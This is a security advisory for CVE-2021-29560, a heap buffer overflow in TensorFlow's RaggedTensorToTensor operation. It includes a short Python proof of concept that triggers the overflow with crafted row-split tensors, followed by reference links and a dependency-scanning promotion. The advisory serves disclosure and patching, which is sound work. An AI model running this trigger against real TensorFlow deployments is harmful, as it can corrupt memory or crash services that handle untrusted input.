CVE-2021-29560: Heap buffer overflow in `RaggedTensorToTensor`
(updated )
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor
:
import tensorflow as tf
shape = tf.constant([10, 10], shape=[2], dtype=tf.int64)
values = tf.constant(0, shape=[1], dtype=tf.int64)
default_value = tf.constant(0, dtype=tf.int64)
l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
row = tf.constant(l, shape=[5, 43], dtype=tf.int64)
rows = [row]
types = ['ROW_SPLITS']
tf.raw_ops.RaggedTensorToTensor(
shape=shape, values=values, default_value=default_value,
row_partition_tensors=rows, row_partition_types=types)
References
- github.com/advisories/GHSA-8gv3-57p6-g35r
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-488.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-686.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-197.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/a84358aa12f0b1518e606095ab9cfddbf597c121
- github.com/tensorflow/tensorflow/security/advisories/GHSA-8gv3-57p6-g35r
- nvd.nist.gov/vuln/detail/CVE-2021-29560
Detect and mitigate CVE-2021-29560 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →